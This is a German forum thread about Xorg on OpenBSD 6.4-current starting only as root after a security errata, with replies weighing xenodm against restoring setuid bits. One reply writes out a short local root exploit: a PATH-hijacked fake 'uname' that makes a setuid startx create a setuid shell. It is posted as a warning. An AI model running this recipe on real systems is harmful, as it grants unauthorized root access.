OpenBSD 6.4-current: Xorg nur als root

berni51

Open-Net-FreeBSD user
Heute hab ich noch einmal probiert, ein OpenBSD auf einem älteren Asus K53U zu installieren. Dazu hab ich einen aktuellen Snapshot, also ein 6.4-current, auf den Stick gebraten und dann ging die Installation los.
Fing alles ganz gut an: Zum ersten mal konnte ich den Atheros-WLan-Chip korrekt ansprechen und es gab eine Netzwerkverbindung. Auch der ATI Radeon Chip wurde erkannt und ich glaubte mich schon am Ziel.
Nach scheinbar erfolgreicher Installation dann das Erwachen: Xorg liess sich nur als root starten. Beim Versuch, das als Normalo zu tun, brach der X-Server ab. Im Logfile finde ich nur 2 Hinweise:
1. Den machdep.allowaperture auf 1 zu setzen
2. Ein Permission-Problem mit /dev/xf86 und /dev/mem.

Die sysctl.conf hab ich dann mit dem machdep.allowaperture=1 erstellt, aber die Rechte der xf86 und mem Devices sind genau so, wie auf meinen anderen OpenBSD-Rechnern.

Hat jemand eine Idee, wo ich noch dran drehen kann?
Oder ist der aktuelle snapshot vielleicht nicht so gut? Bisher hab ich damit nur die besten Erfahrungen gemacht.

Wer hat den entscheidenden Hinweis für mich?

Berni
 
Das hat mit der zuletzt behobenen Sicherheitslücke in X.org zu tun: OpenBSD 6.4 Errata 001

Wenn du Xorg einsetzen willst, dann wird xenodm empfohlen. Wenn du den definitiv nicht einsetzen willst, kannst du auch wieder das setuid-Bit setzen, wovon angesichts der generellen Sicherheitsbedenken hinsichtlich X.org aber abgeraten wird:

# chmod +s /usr/X11R6/bin/Xorg
 
es sollte schon reichen, startx mit nem suid bit zu versehen... so war es zumindest bei meinem das ich vor 4 Wochen aufgespielt habe. Danke nochmal für den Tip @double-p
 
Danke für die Hinweise, genau da lag die Ursache.
Wie bei SierraX hat es bei mir gereicht, der startx das suid bit zu verpassen.
Jetzt läuft alles.

Berni
 
/usr/X11R6/bin/startx habt ihr setuid gegeben?

Only one local root exploit since today!

Bash:
# chmod +s /usr/X11R6/bin/startx
$ mkdir ~/exploit
$ cd ~/exploit
$ echo "/bin/cp /bin/sh /bin/root-sh; /bin/chmod +s /bin/root-sh" > uname
$ chmod 755 uname
$ PATH=. /usr/X11R6/bin/startx

Und schon habt ihr eine tolle setuid-Shell unter /bin/root-sh, mit der man ganz bequem weitere tolle Befehle absetzen kann.

Shell-Skripte und setuid sind immer eine schlechte Idee!
 
OK, danke, habs verstanden. Also ist ein setuid Xorg doch das kleinere Übel. Hab startx also das seuid bit wieder weg genommen.
Werde mal prüfen, ob der Einsatz von xenodm doch möglich ist. Auf dem Laptop wird sehr viel an der Konsole gemacht.
 
Ja, das ist natürlich bekannt. Nur entspricht das nicht meiner Vorstellung von einem schlanken System.
So lange es noch geht, verzichte ich lieber auf das grafische Login.
 
Nach einem kleinen Versuch mit xenodm bin ich ....... dabei geblieben. Ist gar nicht so schlimm, wie ich dachte, eigentlich sogar ganz OK, und es melden sich doch jetzt tatsächlich mehr Leute an diesem Laptop an.
Ressourcenverbrauch ist geringfügig und nicht spürbar, ein Shutdown aus openbox heraus geht auch. Also alles gut mit dem grafischen Login. ;)
Eine winzige Abfrage vorm Shutdown wäre noch schön.
 
Bei mir springt der GPD in den Portrait modus sobald xenodm verwenden will. Es war mir zu bloed dafuer einen Patch oder ne config zu suchen. Am MBP hab ich es nicht ausprobiert... und auf meinen Servern und firewalls verwende ich kein X. Frag mich warum man ausgerechnet jetzt so ein gewese darum macht... das X allgemein ein sicherheits albtraum ist selbst mir schon seit 15 Jahren bekannt...
 
In meinem Fall sind keine negativen Effekte aufgetreten - alles OK. Auf Servern verzichte ich aber schon auf Xorg, auch wenn's nur kleine NFS-Server sind.
 
Meinst Du über das LXPolkit, Pit?
Nein, das ist eine eigene in LXDE integrierte Abmelde-SW, as far as i remember. Die Abmeldetaste ruft den Dialog auf und ich denke, der ist von LXDE "unabhängig" gewesen und könnte sich deshalb auch woanders integrieren lassen.
Ich hatte nur mit GNU/Linux, genauer gesagt mit einem Knoppix-Live -System einmalig damit gespielt und es so in Erinnerung behalten. Möglicherweise braucht das viele Abhängigkeiten nach LXDE, deshalb passt das oben auch nicht mit "unabhängig". Vielleicht eher "losgelöst" oder auch "alleine möglich".
Doch den aktuellen Stand müsstest du dir jedenfalls genauer selbst ansehen. Meine Bemerkung war eher ein kleiner Tip und keine Lösung. Sicher gibt gibt es noch mehr und bessere Möglichkeiten.
 
Zurück
Oben